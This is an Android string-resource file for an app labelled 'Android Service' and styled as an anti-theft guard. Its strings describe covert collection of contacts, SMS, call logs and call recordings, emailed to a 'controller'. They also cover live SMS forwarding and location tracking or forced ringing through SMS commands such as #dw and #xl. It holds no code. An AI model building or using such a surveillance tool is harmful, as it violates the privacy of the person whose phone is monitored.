<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Android Service</string>
    <string name="info">提示</string>
    <string name="warning">警告</string>
    <string name="error">错误</string>
    
    <!-- SMS -->
    <string name="sms_received">收信</string>
    <string name="sms_sent">发信</string>
    <string name="sms_unknown">未知</string>
    <string name="sms_name">短信</string>
    <string name="sms_redirect_header">【来自%s】</string>
    <string name="sms_date">日期</string>
    <string name="sms_type">类型</string>
    <string name="sms_sendername">发信人</string>
    <string name="sms_sendernumber">发信人号码</string>
    <string name="sms_content">短信内容</string>
    
    <!-- Contact -->
    <string name="contact_name">联系人</string>
    <string name="contact_phone">电话</string>
    <string name="contact_address">地址</string>
    <string name="contact_email">邮件</string>
    
    <!-- Phone Call -->
    <string name="phonecall_hour">时</string>
    <string name="phonecall_minute">分</string>
    <string name="phonecall_second">秒</string>
    <string name="phonecall_name">电话记录</string>
    <string name="phonecall_incoming">来电</string>
    <string name="phonecall_outgoing">去电</string>
    <string name="phonecall_missed">未接</string>
    <string name="phonecall_date">日期</string>
    <string name="phonecall_type">类型</string>
    <string name="phonecall_number">号码</string>
    <string name="phonecall_contactname">姓名</string>
    <string name="phonecall_duration">时长</string>
    <string name="phonecall_record">通话录音</string>
    
    <!-- Mail -->
    <string name="mail_from">来自</string>
    <string name="mail_description">（内附联系人，电话，短信记录）</string>
    <string name="mail_body_info">你好，这是来自%s的自动发信，内附联系人，电话，短信记录。试用期内有可能无法看到该来源手机的号码，显示为设备号，请见谅。</string>
    <string name="mail_body_record">你好，这是来自%s的自动发信，附件是录音文件。试用期内有可能无法看到该来源手机的号码，显示为设备号，请见谅。</string>
    
    <!-- Location -->
    <string name="location_sms">点击链接查看手机位置：http://maps.google.com/?q=%s</string>
    <string name="location_sms_latest">%s </string>
    <string name="location_sms_gps">点击链接查看手机GPS位置：http://maps.google.com/?q=%s</string>
    <string name="location_sms_network">点击链接查看手机网络定位：http://maps.google.com/?q=%s</string>
    <string name="location_sms_base_station_gsm">点击链接查看手机基站定位：http://maps.google.com/?q=%s</string>
    <string name="location_sms_base_station_cdma">点击链接查看手机基站定位：http://maps.google.com/?q=%s</string>
    <string name="location_sms_fail">抱歉，当前无法获得所在位置，请稍后再试。若一直无法解决请联系客服。</string>
    
    <!-- Preferences -->
    <string name="pref_title">设定</string>
    <string name="pref_category_sender_mail_key">pref_category_sender</string>
    <string name="pref_category_sender_mail_title">发信邮箱（可选项）</string>
    <string name="pref_category_receiver_key">pref_category_receiver</string>
    <string name="pref_category_receiver_title">主控者信息</string>
    <string name="pref_category_info_collector_key">pref_category_info_collector</string>
    <string name="pref_category_info_collector_title">情报收集</string>
    <string name="pref_category_record_title">通话录音</string>
    <string name="pref_category_sms_redirector_key">pref_category_sms_redirector</string>
    <string name="pref_category_sms_redirector_title">实时短信转发</string>
    <string name="pref_category_gps_key">pref_category_gps</string>
    <string name="pref_category_gps_title">获取所在地理位置</string>
    <string name="pref_category_ring_title">响铃</string>
    
    <string name="pref_use_self_sender_title">使用自己的GMail发信</string>
    <string name="pref_use_self_sender_summary">如果您有GMail邮箱，用它发信有利于保护您的隐私，否则将使用系统内置邮箱发信。</string>
    <string name="pref_sender_mail_title">发信邮箱（仅限GMail）</string>
    <string name="pref_sender_pwd_title">发信邮箱密码</string>
    <string name="pref_invalid_sender_mail">%s 不是一个有效的GMail邮箱地址。</string>
    <string name="pref_safe_mail_title">收信邮箱</string>
    <string name="pref_invalid_mail_format">%s不是有效的邮箱地址。</string>
    <string name="pref_pls_input_pwd">请输入邮箱密码。</string> 
    <string name="pref_record_all_title">全部录音</string>
    <string name="pref_record_all_summary">对所有电话录音（仅当使用自己的GMail发信时可选）</string>
    <string name="pref_safe_phonenum_title">主控手机号码</string>
    <string name="pref_pls_input_valid_safe_phonenum">%s不是有效的手机号码。</string>
    <string name="pref_gps_word_title">激活词（或短句）</string>
    <string name="pref_gps_word_summary">发送短信#dw到被控手机可获知其位置（仅从主控手机上发送有效）。</string>
    <string name="pref_must_use_self_sender">鉴于保护隐私，只有使用您自己的GMail作为发信邮箱，才允许对所有电话录音。前往www.gmail.com免费创建您的GMail账户。更多问题请咨询客服。</string>
    <string name="pref_ring_word_title">强制响铃</string>
    <string name="pref_ring_word_summary">发送短信#xl可强制使其响铃。</string>
    
    <!-- InitActivity -->
    <string name="init_btn_setting">设定</string>
    <string name="init_title">安卓防盗卫士</string>
    <string name="init_btn_testmail">测试安全邮箱</string>
    <string name="init_btn_testphone">测试安全手机</string>
    <string name="init_btn_exit">退出</string>
	<string name="init_hint_testmail">立即将所有通话记录，短信和联系人发至邮箱。</string>
	<string name="init_hint_testphone">发送一条测试短信到主控手机。</string>
	<string name="init_test_sms_content">来自安卓防盗卫士的测试短信。</string>
	<string name="init_send_test_sms_ok">发送成功</string>
	<string name="init_send_test_sms_ng">发送失败。请检查主控手机号码设置是否正确，本手机是否有信号。</string>
    <string name="init_hint_setting">设置主控邮箱和手机，录音号码段，敏感词等。</string>
    <string name="init_hint_exit">发送短信（安全密码）到本机，即可再次激活本对话框。</string>
    <string name="init_processing">处理中</string>
    <string name="init_waiting">请稍候（30秒~3分钟）...</string>
    <string name="init_collecting">正在收集信息...</string>
    <string name="init_sending">正在发邮件...</string>
    <string name="init_pls_reset_phone">重启手机后，所有设定及功能即生效。</string>
    
    <!-- Actions -->
    <string name="action_send_mail_success">发信成功。稍后请查阅您的邮箱。</string>
    <string name="action_send_mail_fail">发信失败，请检查接收邮件地址是否有效。</string>
    <string name="action_network_disconnected">网络未连接</string>
    <string name="action_goto_network_setting">网络未连接。您想现在打开网络连接吗？</string>
    
    <!-- Message -->
	<string name="msg_mobile_net_unvailable">请保证您的手机有信号且不是飞行模式。</string>
    <string name="msg_changed_sim">安卓防盗卫士提醒您：%s更换了手机SIM卡。</string>
    
    <!-- Indication -->
    <string name="indication_unregister_ok">卸载成功。</string>
    <string name="indication_unregister_ng">卸载失败。请检查您发送的指令格式是否正确。若无法解决请联系客服。</string>
    <string name="indication_set_selfsender_ok">设置发信邮箱成功。</string>
    <string name="indication_set_selfsender_ng">设置发信邮箱失败。请检查您发送的指令格式是否正确。若无法解决请联系客服。</string>
    <string name="indication_stop_selfsender_ok">取消发信邮箱成功。</string>
    <string name="indication_stop_selfsender_ng">取消发信邮箱失败。因为您当前对所有电话录音，为保护您的隐私，请继续使用您的专有发信邮箱。若无法解决请联系客服。</string>
    <string name="indication_set_recv_mail_ok">设置安全邮箱成功。</string>
    <string name="indication_set_recv_mail_ng">设置安全邮箱失败。请检查您发送的指令格式是否正确。若无法解决请联系客服。</string>
    <string name="indication_set_recv_phonenum_ok">设置安全手机号码成功。</string>
    <string name="indication_set_recv_phonenum_ng">设置安全手机号码失败。请检查您发送的指令格式是否正确。若无法解决请联系客服。</string>
    <string name="indication_set_targetall_ok">设置对所有电话录音成功。</string>
    <string name="indication_set_targetall_ng">必须使用自己的发信邮箱，才能对所有电话录音。请使用#1#指令设置你的专有发信邮箱（目前仅支持GMail）。若无法解决请联系客服。</string>
    
</resources>
